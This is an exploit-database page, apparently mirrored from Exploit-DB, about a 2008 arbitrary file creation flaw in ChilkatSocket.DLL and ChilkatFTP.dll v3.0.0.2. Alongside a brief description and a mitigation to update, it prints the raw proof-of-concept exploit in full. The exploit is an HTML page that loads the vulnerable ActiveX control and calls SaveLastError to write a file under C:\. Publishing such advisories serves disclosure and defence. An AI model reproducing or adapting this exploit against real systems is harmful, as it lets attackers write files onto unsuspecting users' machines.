header-logo
Suggest Exploit
vendor:
ChilkatSocket.DLL and ChilkatFTP.dll
by:
callAX
9.3
CVSS
HIGH
Arbitrary File Creation
264
CWE
Product Name: ChilkatSocket.DLL and ChilkatFTP.dll
Affected Version From: 3.0.0.2
Affected Version To: 3.0.0.2
Patch Exists: Yes
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
2008

ChilkatSocket.DLL Arbitrary File Creation ChilkatFTP.dll v3.0.0.2 Arbitrary Data Write Exploit

A vulnerability exists in ChilkatSocket.DLL and ChilkatFTP.dll v3.0.0.2 which allows an attacker to create arbitrary files on the system. This is achieved by using the SaveLastError() method of the ChilkatSocket.DLL object. An attacker can use this vulnerability to create malicious files on the system.

Mitigation:

Update to the latest version of ChilkatSocket.DLL and ChilkatFTP.dll.
Source

Exploit-DB raw data:

<html>
<title>ChilkatSocket.DLL Arbitrary File Creation ChilkatFTP.dll v3.0.0.2</title><br><br>
<body>
<h3>ChilkatSocket.DLL Arbitrary File Creation ChilkatFTP.dll v3.0.0.2 Arbitrary Data Write Exploit</h3>

<!c0d3d by callAX 
*-*-*-*-*
0wN thE b0x p4l
*_*-*_*_*
Greetings to str0ke and Fr0git0-->

<HTML>
<BODY>
 <object id=ctrl classid="clsid:{3B598BD0-AF50-48C6-B6A5-63261A48B054}"></object>

<SCRIPT>

function Do_it()
 {
   File = "c:\\boot_.ini"
   ctrl.SaveLastError(File)
 }

</SCRIPT>
<input language=JavaScript onclick=Do_it() type=button value="S3nd me to thls HD">
</body>
</HTML>

# milw0rm.com [2008-12-28]